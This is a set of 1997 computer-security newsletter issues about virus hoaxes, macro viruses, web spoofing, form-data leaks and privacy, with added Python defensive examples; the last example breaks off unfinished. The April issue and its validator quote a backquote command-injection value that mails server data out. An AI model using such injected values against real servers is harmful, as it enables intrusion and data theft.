Computer Knowledge Newsletter – January 1997 Issue

In This Issue:

  • E-mail viruses and other hoaxes

Virus News

If you have not received a warning about one of several E-mail viruses, just sit back and wait; one will show up sooner or later. At this time, the names include: Good Times, XX-1, Deeyenda, PenPal, Irina, and MMF [Make Money Fast]. Warnings about these “viruses” generally talk about opening and reading E-mail with one of those names in the subject. A variety of nasty things are supposed to happen if you do.

The point to remember is that simply reading a text message cannot damage your computer in any way.

Of course, you should never open any attachment to E-mail without first checking it with an up-to-date scanner. This may involve you changing the setup on your mail program as some come with “open on click” as the default. You should change this so that attachments are saved to a file without automatically opening them. This allows you to check the file before you do anything with it.

For more information about virus myths and hoaxes take a look at:

http://www.kumite.com/myths/ [Now http://www.vmyths.com/]

Another joke currently circulating consists of a link that claims to be able to examine the contents of your hard drive. When you click on the link you indeed see the contents of your drive and the impression is left that this comes from the site in question. If you look closely at the link, however, you will see that it is nothing more than a direct link to your hard disk: <file:///c|/>. When activated, this link causes your browser to do a directory of your C-drive and present it to you. Nothing gets sent from your computer to the remote site.

New on the Web Site

We’ve established a new general information page at:

http://www.cknow.com/ckinfo/ [Note: URL has changed; and most of the old information removed as being too old and outdated.]

So far there are pages describing web searching, how to handle ZIP files, drive letter assignment, and the answer to the naming argument for Santa’s reindeer (Donder versus Donner). [Don’t ask! – And, that link has been removed due to copyright issues.]

One of the functions of this newsletter will be to announce new pages added to that collection. If you have a particular topic suited to a single page discussion, please let us know and we’ll attempt to construct a page around that topic and then let you know via the newsletter when it’s up.

Our link page has also been updated. The search dialogs from the search engines we use most often have been placed on the page so you can search the net directly from the Computer Knowledge site! (This isn’t particularly difficult to do; if you want the code for your site just “borrow” it from ours by saving the source and then pasting the appropriate portions into your page. The forms we use came directly from the search sites using similar means.)

And, we are pleased to announce an alignment with Amazon.com Books, a premier internet book seller. Some customers have asked for references to books that complement our tutorials. We’ve added a bookstore page to the site to honor this request. You can scroll through the recommended titles and if you see something you like can click on the book’s title and be taken to Amazon.com where you can read further information and place an order at a discounted price. Amazon.com has several secure methods for payment and the book comes straight to your door. You won’t find much easier book purchasing!

In closing: The best of the New Year to everyone.

Computer Knowledge Newsletter – February 1997 Issue

In This Issue:

Virus News

If you are in a corporate environment and run Microsoft Mail you should be interested in a new Word macro virus: ShareFun. The virus checks for MS Mail and, if found, sends a copy of itself to three random people in your personal mailing list. The message has the subject “You have GOT to read this!” and contains no text; just a Word document. The document is the one you are currently working on and is infected so when the receiver opens it in Word they then become infected and the process begins again.

There are two problems with this virus: it appears to have been sent from a “trusted” source, and it sends whatever you are currently working on to the other party (consider what might happen if you are a supervisor working on a termination letter and that draft gets sent to the intended early).

The simple solution is to delete any messages with the indicated subject and only an attachment. (Note: This is different from the so-called “E-mail” viruses where you should delete messages with a particular subject lest you become infected. You cannot get a virus by reading E-mail text. You can get a virus by running an infected attachment, which is the case here. The message is not the problem; the attachment is.)
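The rule above (the fixed subject line plus an empty message body carrying only a Word document) is easy to turn into a mail filter. The following is an added illustration, not code from the original newsletter; the sample messages are constructed, and the subject string is the one the article quotes.

```python
import email
from email import policy
from typing import List

# Subject used by the ShareFun-generated messages, as quoted in the article.
SHAREFUN_SUBJECT = "You have GOT to read this!"
WORD_TYPES = {"application/msword", "application/vnd.ms-word"}


def is_sharefun_candidate(raw: str) -> bool:
    """True when a message matches the article's rule: the ShareFun
    subject, no readable body text, and a Word document attached."""
    msg = email.message_from_string(raw, policy=policy.default)
    if (msg.get("Subject") or "").strip() != SHAREFUN_SUBJECT:
        return False
    body_text = ""
    has_word_doc = False
    for part in msg.walk():
        if part.is_multipart():
            continue  # containers carry no content of their own
        ctype = part.get_content_type()
        filename = part.get_filename()
        if ctype in WORD_TYPES or (filename and filename.lower().endswith(".doc")):
            has_word_doc = True
        elif ctype.startswith("text/") and not filename:
            body_text += part.get_content()
    return has_word_doc and not body_text.strip()


def filter_mailbox(messages: List[str]) -> List[int]:
    """Return the indexes of messages the rule would quarantine."""
    return [i for i, raw in enumerate(messages) if is_sharefun_candidate(raw)]


# Constructed sample: the shape the article describes (subject, no text, .DOC only).
SAMPLE_SHAREFUN = """\
From: colleague@example.com
To: you@example.com
Subject: You have GOT to read this!
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: application/msword; name="MEMO.DOC"
Content-Disposition: attachment; filename="MEMO.DOC"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA
--b1--
"""

# Constructed sample: same subject, but a human wrote a body, so the rule leaves it alone.
SAMPLE_NORMAL = """\
From: colleague@example.com
To: you@example.com
Subject: You have GOT to read this!
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain

Here is the draft we discussed, see attached.
--b2
Content-Type: application/msword; name="MEMO.DOC"
Content-Disposition: attachment; filename="MEMO.DOC"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA
--b2--
"""

if __name__ == "__main__":
    print(filter_mailbox([SAMPLE_SHAREFUN, SAMPLE_NORMAL]))
```

The filter deliberately keys on the combination of signals rather than the subject alone: a colleague can legitimately use that subject, and a message with real body text is left for the recipient, who still scans the attachment before opening it.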

Add NaughtyRobot to the list of hoax virus alerts. Early in 1997 users started to receive E-mail messages from themselves saying they were “sent to you by NaughtyRobot, an Internet spider that crawls into your server through a tiny hole in the World Wide Web.” The message goes on to tell you your credit card numbers and other information have been captured and that users should alert their ISP, contact the police and a number of other very inconvenient things.

What most people don’t realize is that it’s relatively easy to spoof an E-mail address. So the seed messages started an avalanche and another hoax is born.

The problem here is that something like NaughtyRobot could happen. There are two application add-ons to web browsers that are currently trying for maximum market share: Java and ActiveX. One, Java, was designed from the ground up and has a fair amount of security built in. The second, ActiveX, is based on Microsoft OLE and has little or no real security built in. Microsoft says they are trying to “fix” it but in the meantime an ActiveX application has the power to do any number of nasty things to your computer without your knowledge or permission (a German group has described a method of forcing fund transfers via Quicken using an ActiveX add-on). The only way to be certain at this point in time is to turn ActiveX OFF if your browser supports it. This unfortunately throws the baby out with the bath water, but until the security is properly addressed we’d rather be safe than sorry and suggest you do the same.

In other news, our free virus tutorial has gained significant distribution. It has appeared on the cover CD-ROM for several magazines in the European area for a total distribution of around 400,000. It has also been accepted as part of the standard corporate computer education program at a major computer corporation.

A fairly common theme in the requests for the virus tutorial security DLL has been a search for information on a specific virus because the user is currently infected by that virus. While the security DLL can often reveal more detailed information it is information specifically designed to educate about the virus, not how to remove it. Computer Knowledge does not believe users should attempt to remove viruses without help from an anti-virus program. There are far too many things viruses can do that require highly specialized recovery techniques (e.g., decryption of encrypted data). Recovering by hand requires highly specialized knowledge which anti-virus makers have built into their programs. And, should you have a problem, their technical support people are trained to handle such questions and will often help you even if you are working from just the evaluation version of their software.

If you have a virus, use anti-virus software to rid yourself of it.

General Security

Have a laptop computer and fly? If so, keep reading (actually, keep reading anyhow as the scam described here applies equally well to cameras, luggage, or anything else that looks valuable).

This scam takes place at the magnetic weapon screening port in the terminal. It involves two perps and a mark (that’s you). Perp one goes through the scanner and just hangs around on the other side. The mark approaches the scanner and puts valuable item(s) on the belt to go through the X-ray machine; then heads for the scanner. At this point perp two rushes up and gets ahead of the mark at the scanner. As you might guess, perp two has keys, coins, etc. that set off the alarm and require perp two to back up and clear out pockets. Perp two may have several pockets of things and attempt to go through several times. In the meantime, the mark is held up and the valuables go through the X-ray and are sitting on the other side. At this point perp one ambles up, grabs the valuable item(s) and simply walks off. By the time the mark is through the scanner and realizes something is wrong perp one is gone with the item(s) and perp two is also lost in the crowd.

A few tips to help: Don’t make anything valuable obvious (e.g., stuff your laptop computer into your luggage; don’t carry it in a case that obviously identifies it). At the airport keep everything in sight and don’t let yourself get distracted; if you see someone heading for your items, yell and point (understand when you do this you may get further delayed; security people at airports get suspicious of people who yell, but at least your valuables may be saved). If possible, use the buddy system. One person can carry all the luggage and another can go through first to claim it while the second person transits the detector.

In closing: We wish everyone well. Do stay away from the nasty cold virus that just made its way through our household (hopefully this one won’t travel through E-mail).

Computer Knowledge Newsletter – March 1997 Issue

In This Issue:

Virus News

No new outstanding viruses to report this month; just the usual increase in (mostly) macro viruses for Microsoft Word.

The anti-virus folks, Dr. Solomon’s, announced they are now monitoring newsgroups. Here are excerpts from their announcement:

  • Internet VirusPatrol is a unique service provided by Dr. Solomon’s to protect users of newsgroups from virus infections. This free service is scanning some 70 usenet newsgroups 24 hours a day 365 days a year.
  • Internet VirusPatrol scans all attached executable files and documents for both known and unknown viruses using Advanced Heuristic Analysis, a technique of scanning files for suspicious code and algorithms. When a virus is found Internet VirusPatrol issues an alert to the newsgroup warning other readers not to download the infected file.

General Security

Most people browsing the web don’t realize that underneath the calm exterior there are a number of security concerns. Many are the concern of service providers but others should be the concern of web site managers and even individuals. Indeed, under the right circumstances and if you are just a bit paranoid you can project a method using cookies that determines when you might be out of town and your home is free for robbing.

The press has mentioned some of the attacks ISPs must counter (e.g., SYN flood, DNS hijacking, Ping o’ Death, IP spoofing, and CGI PHF attacks). What we’d like to discuss this month is something web users might encounter: web spoofing.

A full description of web spoofing can be found at:

http://www.cs.princeton.edu/sip/

In summary, web spoofing allows a single site to “emulate” the entire web as far as you are concerned. If you were to link to a spoofing site (call it “www.spoof.net” here) then www.spoof.net would fully control all further net activities in your current session. It does this by redirecting all page requests through www.spoof.net and then feeding those pages to you from www.spoof.net. In the process, any requests or information you send out can be intercepted (and changed) by www.spoof.net; and, any information coming back to you through www.spoof.net can likewise be intercepted and/or modified before you see it. So, www.spoof.net doesn’t have to have a copy of the entire web; it only needs to control access to the web and make changes as necessary for its (bad?) purposes.

You should know that this type of redirection is not new. Several sites advertising anonymous surfing have been using this technique for some time now. The difference is that now the bad guys are thinking about using the technique for less than honorable purposes.

But, can’t you just see that the link you are about to click on is going to direct you to http://www.spoof.net/http://www.microsoft.com/ instead of just http://www.microsoft.com? Yes, if you are looking at the link information in your browser and some JavaScript has not taken over that part of the browser screen and is displaying the “real” URL. This is rather easy to do by adding an onmouseover command to a link. JavaScript can also mask the URL display in other areas of the screen. Web spoofing can even take place when you’ve selected a secure link and you see the little key icon indicating such a link is in place; you have a secure link to www.spoof.net!

So, what can you do? As much as it grates to keep throwing the baby out with the bathwater, there are only two protections you can use right now: (1) Select the options in your browser to turn JavaScript, Java, and ActiveX OFF, and (2) Watch the destination URL for every link you plan to take and make certain they are accurate (e.g., they are not of the form http://www.spoof.net/http://destination.com or http://www.micr0s0ft.com where in the latter case a zero has replaced the oh and you are therefore directed to a place you might not like). When you arrive at a site you trust and that uses JavaScript, Java, or ActiveX you can always turn them on and reload that particular page. It’s not a satisfying solution, but the only other solution is to just remain vulnerable.
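The two URL shapes the article tells you to watch for can be checked mechanically, which is handy when you want to vet a batch of links rather than eyeball each one. The following is an added example, not from the original newsletter or the Princeton paper it cites; the list of trusted host names is an assumption supplied by the caller, and the host names used below are constructed.

```python
import re
from typing import List
from urllib.parse import urlsplit

# Digits the article's example substitutes for letters (zero for oh); one-for-ell added on the same principle.
CONFUSABLES = str.maketrans({"0": "o", "1": "l"})


def suspicious_url(url: str, trusted_hosts: List[str]) -> List[str]:
    """Return the reasons a link looks like the two forms the article warns about.

    An empty list means neither pattern matched (it does not mean the link is safe)."""
    reasons = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()

    # Form 1: a second URL embedded after the host, the way a rewriting
    # (web spoofing) site relays pages: http://www.spoof.net/http://destination.com
    rest = parts.path + ("?" + parts.query if parts.query else "")
    if re.search(r"https?://", rest):
        reasons.append("path embeds another URL (rewriting proxy / web spoofing)")

    # Form 2: a host that becomes a trusted host once look-alike digits are
    # read as letters: www.micr0s0ft.com -> www.microsoft.com
    normalized = host.translate(CONFUSABLES)
    trusted = {h.lower() for h in trusted_hosts}
    if normalized != host and normalized in trusted:
        reasons.append("host %r imitates trusted host %r" % (host, normalized))

    return reasons


if __name__ == "__main__":
    # Constructed links; www.microsoft.com is the article's own example of a genuine destination.
    for link in [
        "http://www.microsoft.com/",
        "http://www.spoof.net/http://www.microsoft.com/",
        "http://www.micr0s0ft.com/",
    ]:
        print(link, "->", suspicious_url(link, ["www.microsoft.com"]) or "no pattern matched")
```

The check is applied to the real `href`, not to the text the browser paints in the status bar, since the article's point is that the displayed URL can be forged; pull the target from the page source (or from the browser with scripting off) before feeding it in.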

In another security story, there is a possibility that when ordering from a secure web site you could, potentially, have your credit card and other info passed to a second web site in an unsecured manner. This is true with either Internet Explorer or Netscape as it is a web problem, not a browser problem.

When you fill out a form on a web page and press the submit button the information is first encrypted (if you have a secure connection) and then sent. But, it still remains in a local cache in unencrypted form. If the form submits using the HTTP GET method then it is possible for that information to be automatically sent to the next site you link to from the ordering page in unencrypted form. It would not be sent in a form that would be immediately useful but would reside in that site’s server logs. The problem here is that the server log files are usually not well protected.

The immediate solution would be to have all web page authors use the HTTP POST method instead of GET. The information is handled in a different manner and not subject to the above problem.

Fortunately, most authors do use the POST command; but GET is available and it’s not known how many authors have used it.

To be safe, after sending in an order via a secure net connection either don’t link to another site from the secure page or, if you do, manually type in the site location instead of taking an automatic link. This is a minor inconvenience; but best to be safe rather than sorry.
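Whether the problem just described has actually reached your own server is something you can check from the receiving side: a GET-submitted order form leaves its fields in the Referer column of the next site’s access log. The scanner below is an added example, not part of the original newsletter; it reads combined-format log lines (constructed here), parses the Referer, and reports entries whose query string carries sensitive field names or card-number-shaped values. The set of field names is an assumption to be adjusted to your own forms.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import parse_qs, urlsplit

# Common log format plus the two quoted trailing fields (referer, user agent).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Assumed field names worth flagging; extend to match your own form's input names.
SENSITIVE_KEYS = {"card", "cardno", "ccnum", "cc", "cvv", "password", "passwd", "ssn"}
CARD_RE = re.compile(r"^\d{13,16}$")


def leaked_fields(referer: str) -> List[str]:
    """Names of query-string fields in a referer that look like order-form secrets."""
    found = []
    for key, values in parse_qs(urlsplit(referer).query).items():
        if key.lower() in SENSITIVE_KEYS or any(CARD_RE.match(v.replace(" ", "")) for v in values):
            found.append(key)
    return sorted(found)


def scan_log(lines: Iterable[str]) -> List[Dict]:
    """Return one record per log line whose Referer carries sensitive form data."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.rstrip("\n"))
        if not m or m["referer"] in ("", "-"):
            continue
        fields = leaked_fields(m["referer"])
        if fields:
            hits.append({"line": lineno, "from": urlsplit(m["referer"]).hostname, "fields": fields})
    return hits


# Constructed sample: line 2 arrived from an order page that submitted with GET.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/1997:10:14:01 -0800] "GET /index.html HTTP/1.0" 200 2048 "-" "Mozilla/3.0"
203.0.113.5 - - [12/Mar/1997:10:15:32 -0800] "GET /links.html HTTP/1.0" 200 1024 "https://shop.example.com/order?name=J.+Doe&card=4111111111111111&exp=12%2F99" "Mozilla/3.0"
203.0.113.9 - - [12/Mar/1997:10:16:10 -0800] "GET /links.html HTTP/1.0" 200 1024 "http://www.cknow.com/links.html" "Mozilla/3.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print("line %(line)d: form data from %(from)s in Referer, fields %(fields)s" % hit)
```

A hit tells the site that received the link that it is now storing another site’s customer data in plain text, and tells the originating site (if you can reach them) which form still uses GET. The same parsing applies to a POST-submitted form’s referer, which is why a clean scan is the expected result once the form is fixed.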

Computer Knowledge Newsletter – April 1997 Issue

In This Issue:

Virus News

There are over 500 macro viruses now. By far, these have quickly become the most widely spread virus problem since viruses were introduced a dozen years ago. There are, however, two ways to virtually guarantee you won’t be infected:

  • Use programs that don’t store macros in the actual data file and/or don’t make macros easy to transmit between computers. Right now, the WordPerfect suite would be the choice (but beware, rumor has it WordPerfect is being changed to store macros in documents; if that happens expect problems with that program as well if they don’t put in anti-virus code).
  • Transmit documents in a format that does not carry macros. I do not open Word documents from anyone else in Word; I read them using the Word Viewer (which does not use macros). If I must edit a Word document from someone else I insist on getting it in Rich Text Format (RTF). This format retains all the formatting but does not store macros. When I transmit documents to others I use RTF as well to show I care. [Update: RTF is capable of directly encoding embedded objects for delivery via that format so if an infected object is embedded into the RTF this format can carry viruses.]

This may seem a bit paranoid, but these simple precautions give great peace of mind and are not at all inconvenient; the translations are transparent.

General Security

If you have a web site or run a server there is a weakness in the CGI scripting that you should be aware of. It involves the backward single quote symbol (`). On many systems UNIX shell commands enclosed in backward single quotes are executed before the command line they are embedded in is executed. The output of the embedded command is then substituted into the original command line and the whole is executed.

Why is this a problem? It’s possible to enter system commands into forms using this technique and hack into systems. One example commonly given would have you enter `who|mail your.mail@address` (including the backward quotes) into the E-mail address block on a form. When the UNIX server processes the E-mail address response, instead of just noting your address it will run the UNIX who command and then mail the response to you at your E-mail address. In short, you get a list of everyone logged into that UNIX server at that particular time. Of course, other more problematic commands could be used instead.

Before you allow form input to be processed by any of your CGI scripts be certain you strip out any backward quote characters as a precaution.
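The advice above is to strip backward quotes; a stronger form of the same precaution, and the one added here as an illustration (not code from the original newsletter), is to validate the address against a strict allowlist and never hand form input to a shell at all. It goes a little beyond the article in rejecting every shell metacharacter, not only the backquote, and in building the mail command as an argument list so that no shell interprets it. The `build_mail_argv` and `send_confirmation` names and the `mail -s` invocation are assumptions for the example.

```python
import re
import subprocess
from typing import List

# Allowlist for a plain address: local part, "@", dotted domain labels, nothing else.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")
# Characters with special meaning to a shell. The policy is reject, not strip:
# stripping only the backquote would still leave $(...) and | in the input.
SHELL_META = set("`$|;&<>(){}\\\"'\n\r ")


def is_safe_address(addr: str) -> bool:
    """True only when the address matches the allowlist and carries no shell metacharacter."""
    return bool(ADDRESS_RE.match(addr)) and not (set(addr) & SHELL_META)


def build_mail_argv(addr: str, subject: str) -> List[str]:
    """Command to send a confirmation, as an argv list (no shell string is ever built)."""
    if not is_safe_address(addr):
        raise ValueError("rejected address: %r" % addr)
    return ["mail", "-s", subject, addr]


def send_confirmation(addr: str, subject: str, body: str) -> None:
    """Run the mail command without a shell, so even an odd subject is just an argument."""
    subprocess.run(build_mail_argv(addr, subject), input=body.encode(), check=True)


if __name__ == "__main__":
    # Constructed form submissions: a normal address and the payload the article quotes.
    for submitted in ["user@example.com", "`who|mail user@example.com`"]:
        print(repr(submitted), "->", "accepted" if is_safe_address(submitted) else "rejected")
```

The distinction that matters is the last function: with an argv list and no `shell=True`, the operating system receives `mail` and its arguments directly, so there is no command line for a backquote to be substituted into. Validation then protects the downstream program (`mail` itself) rather than the shell.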

Miscellaneous

The internet is an interesting place. Logged into mail one day this past month and there, waiting for me, was a message from an Air Force buddy from thirty years ago; long ago lost. You just never know what’s going to pop up from day to day.

For US readers you should be aware that the lawyers have been at it again; but you might get the proverbial “free lunch” because of it.

For some time computer and monitor makers routinely advertised the diagonal on a monitor as the size of the monitor (the same way TV sets are advertised). Some enterprising soul noted that while TV sets have a picture that goes to the edge of the screen, computer monitors do not; they have a typically smaller viewing area due to a mask. This soul was convinced this amounted to false advertising and got a group of lawyers to file a class action suit against many, many monitor and computer makers. A settlement was reached. Some refunds are in order and you may have noted that all ads now say something like xx-inches viewable size.

The long and short of it is that if you purchased a monitor or computer with monitor between 1 May 1991 and 1 May 1995 you are likely entitled to a refund of a portion of your purchase price. How much? If you have not replaced the monitor you get $6. If you replace the monitor between 7 September 1997 and three years from then you can get $13. It looks like there is a $30 limit for any one person as well.

Details have been published in a number of computer publications and are available by calling (800) 789-0311 or visiting the web site:

http://www.computermonitorcases.com

Oh yes, in case you were wondering, the legal firm got $5.8 million plus up to another quarter million dollars for actual expenses. Enjoy your $6.

Computer Knowledge Newsletter – May/June 1997 Issue

In This Issue:

Virus News

The AOL4FREE “virus” has gotten a lot of play in the press. Here is a synopsis of the true story. A Macintosh program called AOL4FREE was actually written some time ago. It did what the name implied, broke through AOL login barriers and gave you the service free. The writer was caught. In March of 1997 an AOL4FREE virus hoax started to circulate. Some poorly-brought-up person noticed this, wrote a simple batch file Trojan, called it AOL4FREE.COM, and placed it on some internet sites. The U.S. Department of Energy’s CIAC noticed this and put up a notice that this file was being widely distributed (which it really was not). People got confused and the media did their usual less than outstanding reporting based on this confusion. There is no AOL4FREE virus and warnings about it are a hoax. But, if you ever come upon a program of that name, delete it.

General Security

The May issue of Infosecurity News reports that Microsoft has set up a special E-mail address specifically for reports of security problems relating to its products. The address is secure@microsoft.com and Microsoft has reportedly assigned a “team of experts” to act on reports mailed to that address. Dare we ask how big this team is?

General Information

There may be some hope on the horizon regarding creation of a master “no-spam” list for the internet. The folks at http://www.aristotle.org promise to be close to agreement with Cyber Promotions, Inc. (and other sites which send spam) regarding a master list of those who do not wish unsolicited spam. It’s a step in the right direction, but there are some conditions. First, at the moment they are only taking names from registered voters in the USA. Second, you have to sign up for their service whereby you set up a free account with them and monitor it for mail on subjects you select (they claim to pay you to do this).

Do you live in an area where there are fire ants? If so you should know that they have an attraction to things electrical. In one recorded incident a University of Texas graduate student watched in horror as one of her final papers disappeared off her PowerBook at 2 a.m. one night during her last semester. After calling for technical support she was asked to pull out the battery and note its serial number. When she did, she found it crawling with ants.

For some reason no one yet understands, electrical equipment suits the ants’ needs. Besides horror stories like the-ants-ate-my-homework disaster, tales of Indonesian ants fouling up the works of modems circulate with yarns about Brazilian ants munching on the gel that coats circuit boards. The ants swarm by the thousands inside circuitry, piling up enough debris to break the electrical connection.

It’s reported that a year ago Lynn Heitman installed a newly patented electrical barrier strip which electrocutes ants as they try to crawl into a Mansfield, Texas, streetlight that has the dubious distinction of being the most infested light in the state. So far it appears to be working.

Bottom line: If you live in an area infested with ants, take care they don’t get into your electronic equipment.

New on the Web Site

Most of the work this month has gone into my long-neglected personal pages. I took out the personal links (they were basically the same as the Computer Knowledge links) and have added a travel page. Have been looking through the photo library of late, trying to figure out what to do with it (photos don’t do much good stuck in an envelope in a drawer). So, I’ve started to put small scanned versions of them plus some notes on the internet. If interested, please stop by and visit (if you like it, check back; I’ll be adding more over time).

[Update: These pages are now on my personal domain at http://tomsdomain.com/]

Also added to the personal section is a rather complete guide to the rosary, why one should pray it, and how to pray it. Even added some papal encyclicals about the rosary. Try…

[Update: These pages are now on my personal domain at http://tomsdomain.com/rosary/]

In closing: Trust everyone has a wonderful summer. Our weather here has been about a month ahead of itself all year and so it’s appropriate to wish everyone a good summer even though it’s still supposed to be spring.

Computer Knowledge Newsletter – June 1997 Issue

In This Issue:

Attention AOL Users

America Online (AOL) and the National Computer Security Association have issued a warning about an array of Trojan Horse programs that can capture passwords from AOL users. The passwords can be sent to various hackers by the Trojan programs. There seems to be a heightened interest in AOL users on the part of the hacker community.

Virus News

Dr. Solomon’s reports a very large surge in new macro viruses over the past month or so. The total count exceeds one thousand now.

There is some good news when you migrate from Word 6 or 7 to Office 97: an entirely new macro language is used in Office 97 (Visual Basic for Applications 5). WordBasic programs won’t directly run under VBA5. Unfortunately, VBA5 attempts to convert any WordBasic programs it encounters. The shipping version does not convert a few named WordBasic macro viruses, but any new viruses not known before Office 97 finished beta testing may very well be automatically converted (not all can be).

And, of course, native VBA5 viruses are possible and exist (e.g., NightShade).

Also multiplying rather rapidly are virus hoaxes. It seems some folks have nothing better to do than think up (or copy) technobabble and put it out as the newest way to get a virus over the internet. Some of the latest include: Matra R-440 Crotale virus, Bud Frogs Screen Saver, the “A MOMENT OF SILENCE..” virus, Join The Crew, Valentine Greeting, Hackingburgh Virus, Yukon3, and, last but not least the Undelivered Mail Virus. This latter is particularly bad because at one time or another almost everyone is going to get a system message that says some E-mail can’t be delivered. These system messages are normal and informational only. Fortunately, the hoax message is almost a direct copy of the old standard hoax, Good Times.

General Security

It’s time for a reminder: BACKUP YOUR DATA!

The need for a proper backup was brought home recently to a friend. This friend had important data on a Bernoulli cartridge and the program to access that data on another cartridge. In some way (we were not able to figure out the exact sequence of events) all files and directories on the cartridge which contained the recovery program were deleted. I was able to recover some of the files and directories but other directories were not available for recovery. The directory files were on the disk but their links to their directory names were lost. By searching the disk I was able to find those directory files and then recover the deleted files in them BUT all the recovered files had to be placed into the root directory of the recovered disk and, worse yet, all of the files had no first letter in their names (DOS replaces the file’s first letter with a special character on delete). It’s likely that even though the files were recovered they won’t be of much use because it will be difficult, if not impossible, to correctly organize and rename.

It’s important to have a backup and, for really critical things, a backup of the backup stored in a different location. This latter, in case some disaster hits your primary backups. And, oh yes, if you use a backup program be certain to include the recovery program for the backups with the backups (you’d be surprised at how many people don’t!).

Do you have an AOL account? If so, do you know that some of the personal information you provided to AOL may be being packaged up and sold to others?

The 9 June 1997 issue of Inter@ctive Week reports that AOL is quietly packaging information it has with information gathered via market research and then selling that package. Can you stop them? According to the article, yes (although it does not say exactly how and I am not an AOL subscriber and so cannot test the techniques). According to the article you have to look in two places:

  • Two levels down in the AOL Member Services area there is supposed to be a FAQ, and one of the questions is supposed to address keeping your name off of mailing lists.
  • As far as removing yourself from demographic packages one has to go to the terms-of-service contract. The removal method is supposed to be in the fifth part of the ten that make up the contract.

It’s probably worth trying to find the information if you are an AOL member.

General Information

Do you run a small business or intend to apply for a loan? Be careful about advance-fee loan scams. Companies that advertise themselves as loan “brokers” advertise in hope you will come to them. When you contact them they will pressure you to deal with them for your loan (the pressure usually implies that you must sign up “now” or not get a loan). With a normal broker the fees charged by the broker will usually be taken out of the loan itself and so the broker doesn’t get paid until you get the money. With the scam artist you will be asked for the loan fees up front. The scam is that you pay and then never see the loan money (or your fees despite an often-promised money back guarantee).

In a totally unrelated matter and as much as I dislike “tooting one’s own horn” I’ve got to pass on the following quotes from a recent press release.

Warwick, RI, June 11, 1997 — The Shareware Industry Awards Foundation (SIAF) announced the premiere induction of 52 individuals, companies, and programs in the International Shareware Hall of Fame, a new online pantheon honoring the pioneers in the fast-growing shareware industry. The first year’s inductions were voted by the officers of the SIAF with suggestions through online polling by ‘Net surfers conducted through the popular web site Sharewarejunkies.com.

The 1997 International Hall of Fame inductees are:
[the full list, including…]
Tom Simondi

This was an unexpected honor and I just hope my continued activities will reflect positively on shareware.

In closing: If anyone knows any secrets for growing lemon trees in a coastal region with mild temperatures and rock-hard sandy hardpan soil please let me know via E-mail.

Computer Knowledge Newsletter – July 1997 Issue

In This Issue:

Virus News

The virus world has been fairly quiet over the last month. No new major outbreaks have been reported and no significant new hoaxes have surfaced. Hopefully, the virus and hoax writers are taking their vacation.

If you happen to be in the San Luis Obispo area at 4pm on the 11th of September you might want to tune in to KVEC at AM 920 on the dial. I’m scheduled to discuss computer viruses on a technology show run on that station.

Privacy

Last issue we told you about AOL selling name/address personal information. This month a report surfaced which indicated they planned to add telephone numbers to that. As this is being written the news media report that AOL has now backed away from including telephone numbers due to what is described as very negative feedback from customers. Good work to whomever complained.

You might wonder why AOL has been featured when few on this mailing list have AOL addresses. It’s simple: if one ISP can do these things, others can as well. If privacy is a concern to you then you might want to check with your ISP to see what their policies are. Just a word to the wise.

On another topic, an E-mail request came in relative to various techniques one can use to help with privacy concerns while browsing the web. Two particular techniques were mentioned (anonymous browsing and use of a proxy server). I answered in E-mail but thought that the topic would be interesting in the newsletter.

The idea behind anonymous browsing and, to some extent a proxy server, is that the browser (i.e., you) are better protected from web sites you are visiting finding out about you and your browsing habits. Basically, you request a web page from the anonymous service or proxy server and that site then goes out and gets the information you requested. It then forwards it to you. The result is that the web site with the information knows it’s been visited by the anonymous service or proxy server but has no knowledge of you. The proxy server also advertises that it can speed up your access to the web because, unlike the anonymous browsing service, if the proxy server already has the page you are interested in viewing in its local storage it will serve up that copy to you instead of going out to get a fresh copy. The chances are that your connection to the proxy server is faster overall as that’s typically why you would use one.

While these techniques work to help protect privacy from the web in general, it should be fairly obvious that the anonymous service and/or proxy server can track your requests and compile data about you if they so desire. It’s up to you to decide if you trust the service you use or not.

The other thing to consider with either service is that they can serve as a censor. Some countries, for example, only allow connection to the internet via proxy servers controlled by the government. So, they can not only track your movements on the web, but they can also control what you see by blocking sites or pages that the government thinks you should not see. The same could be applied to private proxy servers you might connect to (and some national internet providers connect you to theirs by default).

This is not to say you should not use these services; they can be valuable and helpful. Just be aware that there are risks as well as benefits.
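To make the three points above concrete (the origin site sees only the proxy, the proxy sees everything you ask for, and the proxy can cache or block at will), here is an added toy simulation in Python. It is an illustration written for this newsletter archive, not code from any proxy product; the site names, the user address and the page contents are all constructed.

```python
class OriginSite:
    """The web site being visited. It can log only the address that connects to it."""

    def __init__(self, pages):
        self.pages = pages            # url -> page body (constructed)
        self.access_log = []          # (address seen, url)

    def get(self, url, client_address):
        self.access_log.append((client_address, url))
        return self.pages.get(url, "404 not found")


class CachingProxy:
    """Fetches pages on the user's behalf, keeps a local copy, and may block URLs.
    Everything the user asks for passes through here, so it can all be logged."""

    def __init__(self, origin, address, blocked=()):
        self.origin = origin
        self.address = address        # the only address the origin ever sees
        self.blocked = set(blocked)   # policy list: a private or state proxy can censor
        self.cache = {}
        self.request_log = []         # (user address, url, outcome)

    def get(self, url, user_address):
        if url in self.blocked:
            self.request_log.append((user_address, url, "BLOCKED"))
            return "403 blocked by proxy policy"
        if url in self.cache:         # served from local storage: faster, origin not contacted
            self.request_log.append((user_address, url, "HIT"))
            return self.cache[url]
        page = self.origin.get(url, client_address=self.address)
        self.cache[url] = page
        self.request_log.append((user_address, url, "MISS"))
        return page


def demo():
    """Run one user through the proxy and return what each side ended up knowing."""
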